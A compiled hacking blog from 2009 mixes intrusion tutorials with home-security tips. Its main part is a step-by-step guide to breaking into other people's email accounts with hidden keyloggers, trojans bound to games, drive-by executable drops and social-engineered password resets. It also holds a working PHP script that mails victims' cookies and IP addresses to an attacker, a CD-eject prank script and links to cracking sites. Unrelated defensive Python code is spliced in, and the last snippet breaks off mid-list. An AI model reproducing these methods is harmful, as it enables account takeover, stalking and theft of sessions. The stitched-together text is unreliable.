(Sorry, I have made this as a beta version, as I will develop the user interface community joining script.)
it adds to a community of mine (for long life only)
(with updated codes)
code:
Download Varun's Profile Creator
requirements:-
Download Other Requirements to Run Varun's Profile Creator
And a good comment is all I wanted for this hard work.
---VARUN
Wednesday, March 25, 2009
Tuesday, March 24, 2009
Few Best Hacking Sites
lemme start
http://www.smokeronline.de/
-- http://g_b_m_x.tripod.com/
-- http://www.2600.com/
-- http://xisp.org/xfactor.html
-- http://www.xisp.org/downloads.html
-- http://www.assasin-germany.de/
-- http://www.megasecurity.org/Binders.html
-- http://biw.rult.at/
-- http://www.hoobie.net/brutus/
-- http://msgs.securepoint.com/bugtraq/
-- http://www.c0rtex.de/links.php
-- http://hem.passagen.se/btener/?noframe
-- http://www.computec.ch/download.php#cat3
-- http://www.mut.ac.th/~b1121625/crack.html
-- http://www.blackhat.be/
-- http://www.blackhat.be/cst/
-- http://www.phreak.org/html/main.shtml
-- http://www.diquip.gq.nu/flooders.html
-- http://askmatador.com/ep/crews.htm
-- http://www.hirosh.tk/
-- http://www.euyulio.org/
-- http://www.fategate.de/Start.html
-- http://www.networkpunk.com/?q=files&PHPSESSID=e0dc51a110811679c2b540291bd35089
-- http://www.snapfiles.com/freeware/freeware.html
-- http://lists.netsys.com/mailman/listinfo/full-disclosure
-- http://www.glocksoft.com/index.htm
* http://www.freewebs.com/blacknet/en/download.html
* http://www.mess.be/ // mess up wid msn messenger
* www.hackthissite.org
* http://www.filehippo.com/ // all file downloads
* http://www.subnetmask.info/ // network checking site
* http://pickit.uni.cc/windows_1_0_3.php // windows First release ever installation video
* www.Zamzar.com // convert file formats FREE
Breaking Into Emails
'How to' Break into email accounts
Disclaimer :
I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!
Introduction
I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.
Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when pursuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They cannot be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now let's get to what you want to know.
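The lockout behaviour described above, seen from the service's side, as an added example that is not part of the original post: a per-account failure counter with a sliding window, showing why guessing against one named account stops working once the account locks, even for the right password. The thresholds, class name and sample events are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque


class FakeClock:
    """Settable clock so the demo does not have to wait in real time."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t


class LoginThrottle:
    """Per-account failure counter with a sliding window and a timed lock.

    Hypothetical defaults: 5 failures within 15 minutes lock the account
    for 30 minutes.
    """

    def __init__(self, max_failures=5, window=900.0, lock_for=1800.0,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.lock_for = lock_for
        self.clock = clock
        self.failures = defaultdict(deque)  # account -> deque of (time, source)
        self.locked_until = {}              # account -> time the lock ends

    def is_locked(self, account):
        until = self.locked_until.get(account)
        if until is None:
            return False
        if self.clock() >= until:
            # Lock has run out: forget it and start counting afresh.
            del self.locked_until[account]
            self.failures.pop(account, None)
            return False
        return True

    def attempt(self, account, source, password_ok):
        """Return "ok", "denied" or "locked" for one login attempt."""
        now = self.clock()
        if self.is_locked(account):
            # Checked before the password: a correct guess made while the
            # account is locked is refused like any other attempt.
            return "locked"
        if password_ok:
            self.failures.pop(account, None)
            return "ok"
        queue = self.failures[account]
        while queue and now - queue[0][0] > self.window:
            queue.popleft()                 # failures older than the window
        queue.append((now, source))
        if len(queue) >= self.max_failures:
            self.locked_until[account] = now + self.lock_for
            return "locked"
        return "denied"

    def sources(self, account):
        """Distinct sources behind the failures currently counted."""
        return sorted({src for _, src in self.failures.get(account, ())})


def demo():
    """Replay constructed events: (time, account, source, password_ok)."""
    events = [
        (0, "alice", "203.0.113.5", False),
        (10, "alice", "203.0.113.5", False),
        (20, "alice", "203.0.113.5", False),
        (30, "alice", "198.51.100.7", False),
        (40, "alice", "198.51.100.7", False),   # fifth failure: lock starts
        (50, "alice", "192.0.2.10", True),      # right password, still locked
        (1840, "alice", "192.0.2.10", True),    # lock expired
    ]
    clock = FakeClock()
    throttle = LoginThrottle(clock=clock)
    results = []
    for when, account, source, ok in events:
        clock.t = float(when)
        results.append(throttle.attempt(account, source, ok))
    return results


if __name__ == "__main__":
    print(demo())
```

A lock keyed only on the account also lets anyone who knows the address lock its owner out, which is why the per-source view from `sources` is kept for deciding whether to throttle a source instead.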
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.
One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).
Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).
Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in
C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
http://download-freeware-shareware.com/Freeware-Internet.php?Type=4171
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.
One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...
Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it
Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...
On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Funny Cd Hack
set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection
sub open_saysame()
    on error resume next
    do
        if drives.count >= 1 then
            for i = 0 to drives.count - 1
                drives.item(i).eject()
            next
        end if
    loop
end sub
open_saysame()
Save as a .vbs file.
Cyber Defense
The Bear Joke
There were two guys in the woods when a bear came running after them. They both started running. "Are you crazy? We can't outrun this bear!" one shouted. "I don't have to outrun the bear," the other replied, "I just have to outrun you."
The bear is like a hacker. If he sets his sights on you he's going to get you but you don't want to be the easiest target.
Defending your computer against hackers takes a little work but it is well worth it. Here are five important topics about defending your system.
1. Play Hide and Seek
2. Be Offensive!
3. Loose Lips Sink Ships
4. Taking a Hit
5. Stay Alert
Hide and Go Seek in Cyber Space
To discourage hackers, you want to make it hard for them to find you. By remembering to follow a few tips, you can make yourself harder to find than most. That's important since hackers are usually looking for the easiest targets. Some easy things you can do are:
* Turn off your computer when you are not using it. This is especially important if you have an "always on" type of connection
* Get a firewall if you have DSL or a cable modem
* Don't visit chat rooms unless they are closed and you know the chat room administrator
You can find out in seconds if you are an easy target. Just go to GRC.com. IT'S EASY!! When you run the program, your computer will be rated for security in several different areas. It only takes a few seconds to get the results. Be sure to also run the "Probe My Ports" utility to find out how secure your computer's ports are.
The Best Defense is a Good Offense
VIRUS PROTECTION - If someone does break into your home computer, almost always it is through a Trojan horse type program. A Trojan is a program that appears to do one thing, but also has an unwanted activity hidden inside. The most dangerous Trojans to the home user are remote administration programs.
Many serious problems can be avoided with a good anti-virus program like Norton Anti Virus, made by Symantec, and Virus Scan, made by McAfee. These programs automatically check any new files or programs as they are loaded onto your computer. You can get regular updates from both companies over the internet. These are very good programs but they are not foolproof. The very latest viruses are sometimes not detected right away.
A free antivirus program that will protect you from most break-ins is InoculateIT Personal Edition. Updates are also free. According to Sébastien Sauvage "Their support is first class and free (I got an answer and program update in less than 24 hours !)".
(Important Hint - it is usually a good idea to only use one anti-virus program on your computer since these types of programs use the same system resources.)
FIREWALLS - One way to protect yourself from hackers is to use a Personal Firewall. The term "firewall" is used to describe some of the walls inside commercial buildings. These walls are required by most modern building codes. These firewalls are designed to keep a fire from spreading inside the building. A computer firewall works in the same way.
E-MAIL - The most common way that viruses are spread is through e-mail. Usually the virus is not in the e-mail message itself, but is in a separate file that is attached to the e-mail. The virus is activated on your computer when you open the attachment. You will not be infected by just reading the message. Recently, some viruses have been designed in a very clever way. When the attachments are opened, the virus program sends itself as an e-mail message to everyone in that person's address book. This can be devastating because people receiving these messages think they are from a trusted source, so they open the infected attachment and the cycle keeps repeating itself.
You can be sure that you will never send your friends an e-mail with a virus attachment by NEVER, EVER opening an e-mail attachment that ends in .DLL or .EXE, even if the message is from your best friend. The only time it is ok to open one of these attachments is when you are expecting it and you know exactly what it is!
OUTWITTING SCRIPT BASED VIRUSES - Here's an easy way to protect against VBScript-based viruses such as ILOVEYOU: Change the Open action for VBS files as follows:
1. In Windows Explorer, select View | Folder Options.
2. Next, select File Types, then scroll down to locate the entry containing the VBS extension, probably "VBScript File".
3. Click Edit, then double-click the Open action.
4. Next, under the "Application Used To Perform Action" dialog box, use the Browse tool to select Notepad (or Wordpad) and click OK.
Most legitimate sources will not send a VBS script in e-mail so you are not missing much, but if you still need to run a VBS script you can do that by entering WSCRIPT thefilename.vbs in the Run dialog. You also need to change the settings for other script file types, such as Windows Scripting Host Settings File (WSH extension) and JScript File (JS extension), the same way you did for the VB Script extension.
Now, if you get an e-mail with a VBS script attached, it can no longer do its dirty work. Instead, it opens up in Notepad and you can get someone who knows about Visual Basic to look at it before running it.
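The E-MAIL and script-virus advice above can also be enforced before a message reaches the inbox. The following is an added example, not part of the original article: it parses a raw message and flags attachments whose real extension runs on open, including the "harmless.txt.vbs" double-extension disguise. The sample message, file names and the extra extensions beyond the ones the article names are assumptions.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows executes or hands to a script host on double-click.
# .exe, .dll, .vbs, .wsh and .js come from the article; the others are added assumptions.
RISKY = {".exe", ".dll", ".vbs", ".wsh", ".js",
         ".vbe", ".jse", ".wsf", ".scr", ".bat", ".cmd", ".pif", ".com"}
# Harmless-looking extensions commonly placed in front of the real one.
DECOYS = {".txt", ".doc", ".jpg", ".gif", ".pdf", ".xls"}


def classify_filename(name):
    """Return the reasons an attachment name is risky (empty list: nothing found)."""
    # Windows drops trailing dots and spaces, so "a.vbs. " still opens as a .vbs file.
    cleaned = name.strip().rstrip(". ").lower()
    parts = cleaned.split(".")
    if len(parts) < 2:
        return []
    reasons = []
    final_ext = "." + parts[-1]
    if final_ext in RISKY:
        reasons.append("runs on open: " + final_ext)
        if len(parts) >= 3 and "." + parts[-2] in DECOYS:
            reasons.append("double extension: ." + parts[-2] + final_ext)
    return reasons


def scan_message(raw_bytes):
    """Map every attachment filename in a raw RFC 5322 message to its findings."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        filename = part.get_filename() or "(unnamed)"
        findings[filename] = classify_filename(filename)
    return findings


def build_sample_message():
    """Constructed test message; the attachment bodies are inert placeholder bytes."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "check this out"
    msg.set_content("See attached.")
    for name in ("greeting.txt.vbs", "report.pdf", "setup.exe"):
        msg.add_attachment(b"placeholder, not a real file",
                           maintype="application", subtype="octet-stream",
                           filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, reasons in scan_message(build_sample_message()).items():
        verdict = "BLOCK" if reasons else "ok"
        print(f"{verdict:5} {filename}: {'; '.join(reasons) or 'no finding'}")
```

The check looks only at the name, so it complements the anti-virus scan rather than replacing it.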
TURNING OFF FILE AND PRINT SHARING - You need to make sure that you are not giving everyone who has access to the Internet access to your printer and files!
Follow these easy steps to turn off file and print sharing:
Step 1- Go to Settings and open the Control Panel
Step 2- Choose Network and then choose File and Print Sharing.
Step 3- Uncheck both boxes.
Privacy Is The Best Policy
Loose lips sink ships and being careless with your passwords can give hackers access to very confidential information. It is very important to choose a good password and then keep it secret.
KEEP YOUR INFORMATION PRIVATE - Click HERE to learn about encryption
When you think you have a virus
There is not a whole lot you can do after a virus enters your system. One thing you can do is check out some of the anti virus software that is on the market. Some of these programs have a rescue disk that might allow your computer to start. If your computer will start, the anti virus software will probably be able to identify the virus and maybe even kill it.
Stay Alert!
A good thing to know:
If you're not actively surfing and you notice your modem lights are flashing, you could have a hacker testing for your system's vulnerabilities.
Be sure to visit these Microsoft sites for help in keeping your system safer from attack.
Unlimited Download From Rapidshare
Download UNLIMITED from Rapidshare
1. Copy and paste this code into Notepad or any other text editor:
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
2. Save the file as rapidshare.de.bat and leave it on your desktop.
3. Every time you download from Rapidshare, double-click on it!
Note: it works only on a dynamic IP.
Have fun!
Free Airtel Sms
ALL THESE THINGS R FREE USE IT WITHOUT ANY TENSION
DIAL 181 FOR FREE
1)LIVE SCORE
2)INTERVIEW
3)MUSIC
4)ASTROLOGY
AND MANY MORE STUFFS FOR FREE
ENJOY HACKING WID ME!
FOR FREE MISSED CALL ALERT
DIVERT UR CALL, WEN BUSY TO 678
N ENJOY IT.
NOTE: THOSE WHO R CALLING U THEIR BALANCE WILL GET REDUCED, BUT NOT URS.
MANY OF US ALWAYS MAKE A RECHARGE OF 200rs TO GET ONE MONTH VALIDITY
BUT WE GET A SMALL AMOUNT OF RUPEES 50, WHICH IS NOT SUFFICIENT.
SO FRNDS I HAVE A GOOD IDEA INSTEAD OF THAT
FIRST MAKE A REFILL OF 60rs
THEN SEND A MESSAGE AS SMS48 TO 250
U WILL GET ONE MONTH VALIDITY + 150 SMS FREE
NOW U HAVE 140rs IN UR HAND OUT OF THAT 200rs
TELL THE REFILLER TO MAKE A REFILL OF 100rs
HE WILL GIVE U A REFILL OF 80rs
THEN TELL HIM TO GIVE U 4 TIMES 10 WALLA CHOTA REFILL
U WILL GET 32rs.
SO FRNDS DID U UNDERSTAND HOW TO MAKE THIS SCHEME WORK
ENJOY IT!!!!!
U WILL GET
1)112rs AS UR BALANCE
2)150 FREE SMS
3)ONE MONTH VALIDITY
Fastest Way To hack Into System
Fastest Way To Hack Into Other Systems
Well, as I already mentioned, you can hack any system as it is connected to what we call "INTERNET". To connect to the internet, a system allocates a port for communication and data transfer. So what we have to do is get into the port that is to be hacked.
Steps: -
1. Software PORT SCANNER from google.
2. The IP address of the victim whose port is open.
3. Download NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet....
4. The IP of victim u found initially into NETLAB .
5. Thats it now you can access his system.
Note: This is really Hardcore Hacking and you should be very careful while doing all this, and you do all this on your own responsibility. This site is never responsible for anything you do after reading any article from this site, and there are almost 50-50 chances that you may get caught, so don't try this unless you are aware of everything. Yes, you can freak out some of your friends by telling them that you can hack their systems very easily.
Good Luck!
Cookie Stealing
For php mail sender download mysql it is a s/w like .RAR file...
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
?>
3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......
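The script above mails whatever arrives in its `cookie` query parameter, so it only yields a session when page script was able to read the session cookie in the first place. The following is an added example, not part of the original post, showing the server-side countermeasure: audit a site's Set-Cookie headers for HttpOnly, Secure and SameSite and produce the hardened form. The cookie names and values are constructed.

```python
def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    pieces = [p.strip() for p in header_value.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        if piece:
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return finding codes for one Set-Cookie header (empty list: hardened)."""
    _, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        # Without HttpOnly the cookie is visible to script through document.cookie.
        findings.append("missing-httponly")
    if "secure" not in attrs:
        # Without Secure the cookie also travels over unencrypted HTTP.
        findings.append("missing-secure")
    samesite = attrs.get("samesite", "").lower()
    if samesite == "":
        findings.append("samesite-unset")
    elif samesite == "none":
        # SameSite=None attaches the cookie to every cross-site request.
        findings.append("samesite-none")
    return findings


def harden_set_cookie(header_value):
    """Append the missing protective attributes; existing attributes are kept."""
    _, _, attrs = parse_set_cookie(header_value)
    hardened = header_value.strip().rstrip(";").rstrip()
    if "httponly" not in attrs:
        hardened += "; HttpOnly"
    if "secure" not in attrs:
        hardened += "; Secure"
    if "samesite" not in attrs:
        hardened += "; SameSite=Lax"
    return hardened


# Constructed response headers, as a site might emit them.
SAMPLE_HEADERS = [
    "PHPSESSID=constructed123; Path=/",
    "theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax",
    "sid=constructed456; Secure; SameSite=None",
]


def audit_all(headers):
    """Map each cookie name to its findings."""
    return {parse_set_cookie(h)[0]: audit_set_cookie(h) for h in headers}


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header)
        print("  findings:", audit_set_cookie(header) or "none")
        print("  hardened:", harden_set_cookie(header))
```

An existing `SameSite=None` is reported but left in place, because changing it can break a legitimate cross-site integration and needs a human decision.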
Hack Attack
Did you know that a hacker could be watching you right at this very moment, reading exactly what you are reading right now, and you didn't even know they were there or how they got in?
A hacker can get into your bank account if you save your password on your PC. They can "break" your password using commonly available programs and then change the passwords to your banking accounts and PC, effectively locking you out. But they don't even need to "break" your password if they load the right program on your PC.
They can, and do ...
..steal and delete files,
..load dangerous programs onto your PC,
..involve you in computer crimes.
True story:
A woman gets up in the middle of the night and notices her PC operating all by itself: an invisible hand is controlling her mouse and opening up applications. Thinking that her PC is malfunctioning, she calls the PC manufacturer the next day. Of course, now, the PC is behaving normally. She finds that she has been infected with a commonly available trojan, and she had witnessed the hacker rummaging through her system.
Continue reading and you will learn how they get in ........
These are the 5 steps to a successful "hack".
1. Hackers look for easy targets and find out information about them and their systems.
2. Breaking into your system.
3. Getting authority to control everything on your system.
4. Hiding the evidence of their break-in.
5. They load programs and passwords on your PC to give them easy access in the future.
Scoping Their Target
Every computer that connects to the Internet is assigned an IP (Internet Protocol) address. This is very similar to a telephone number in many ways. If you have a DSL connection or cable modem connection your IP address stays the same and is "always on". If you have a "dial-up" account, then your IP address is dynamic (it changes each time you connect), and your ISP (Internet Service Provider) cuts you off after a certain amount of time of inactivity.
Dial-up accounts are less hacker friendly because your IP address changes each time you are on. This makes it impossible for the hacker to make repeat visits unless he has tricked you into loading a program on your PC that tells him when you are on-line and gives him your current IP address.
"Always on" connections are just that, always connected and open for attack. The hacker can take his time getting to know your system and its weaknesses, searching until he finds a way in. Your only safety is in the vast numbers of open, unprotected systems.
There are many ways for the hacker to find out what your IP address is. Some of the more common methods are through chat rooms, by looking up domain names on a domain name registrar site, or by running programs that can create a log of all valid addresses.
Chat rooms are the easiest way for hackers to find out your IP address. All they have to do is right click on your chat id and they have your IP address. With your IP address in hand they can start testing your system for weaknesses.
You would be amazed at what information is available from a domain name registrar like Network Solutions. Anyone can type in the name of a domain, for example, Yahoo.com, and find out employee names, phone numbers, fax numbers, physical addresses and IP addresses.
Breaking In
A hacker wants to know your IP address and what operating system you are running. Most home PCs run Windows, so home PC hacking is easy because there are many known Windows "bugs" that can be taken advantage of. Most home users have never worried about computer security.
Hackers look for commonly known system weaknesses (bugs or holes in software). The operating system, like Windows, has bugs, as does other software such as browsers like Microsoft's Internet Explorer. They scan your open ports looking for a running program that they can take advantage of. Scanning is like a burglar who checks all the doors and windows of your house to see if any are unlocked.
Windows 95 and 98 often have the File and Print Sharing option on. This allows someone to access your hard drive and load any program they want on your hard drive, or delete or change any file they want on your PC. (The next page, Cyber Defense, will show you how to turn this off.) This access makes it very easy for a hacker to use your PC as his own.
Hackers often use trojans to break into and control home computers.
One of the most famous hackers, Kevin Mitnick, used social engineering to obtain needed information to break into systems. Social engineering is where a person wants to find out information about you, so they call you and trick you into telling them what they want to know. They then use that information to break into your or your company's system.
Basically, hackers don't need to know much of anything about you to get into your system. They are counting on the public being uninformed and use that lack of knowledge to gain access to many computers.
Getting Total Control
You may be thinking...
"I don't have to worry, my PC is password protected."
Not true!
PCs used at home did not need a lot of security features before the Internet. They were designed for convenience, not security. Windows 95 and 98 are very insecure. It takes about 10 seconds to bypass any password you have to "lock out" other people from your home PC. Don't make the mistake of thinking that because you have password protected your PC, that it is safe. IT IS NOT SAFE!
Hackers use specialized programs to "crack" passwords. Your password at work or to your bank account can give a hacker much greater control over your life or company than you realize. Choose your password carefully. Please take the time now to read about how hackers "crack" passwords and how to create a good password.
Disposing of the evidence
One way that hackers camouflage their dirty work is by changing the name of their programs to look like program names of legitimate system programs. Or they will create a hidden folder to keep all their programs in.
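Both camouflage tricks described above leave traces a defender can test for. The following is an added example, not part of the original article: it triages a process inventory for a system binary name running from the wrong directory, a one-character lookalike of a system name, and an executable living in a hidden folder. The inventory is constructed, and the table of expected directories is an assumption for a current Windows install.

```python
from pathlib import PureWindowsPath

# Assumed baseline: where these well-known binaries live on a current Windows install.
EXPECTED_DIR = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent swap."""
    prev2, prev = None, list(range(len(b) + 1))
    for i in range(1, len(a) + 1):
        cur = [i] + [0] * len(b)
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            # Two adjacent characters swapped ("scv" for "svc") counts as one edit.
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def check_process(record):
    """Return finding codes for one inventory record."""
    path = PureWindowsPath(record["path"])
    name = path.name.lower()
    folder = str(path.parent).lower()
    findings = []
    if name in EXPECTED_DIR:
        # Right name, wrong place: a renamed program borrowing a system identity.
        if folder != EXPECTED_DIR[name]:
            findings.append("system-name-wrong-dir")
    else:
        # Near-miss spelling of a system name, meant to pass a quick glance.
        for known in EXPECTED_DIR:
            if osa_distance(name, known) == 1:
                findings.append("lookalike-of-" + known)
    if record.get("dir_hidden"):
        findings.append("hidden-directory")
    return findings


def triage(inventory):
    """Map pid -> findings for every record that has at least one finding."""
    flagged = {}
    for record in inventory:
        findings = check_process(record)
        if findings:
            flagged[record["pid"]] = findings
    return flagged


# Constructed inventory; dir_hidden records whether the folder has the hidden attribute.
SAMPLE_INVENTORY = [
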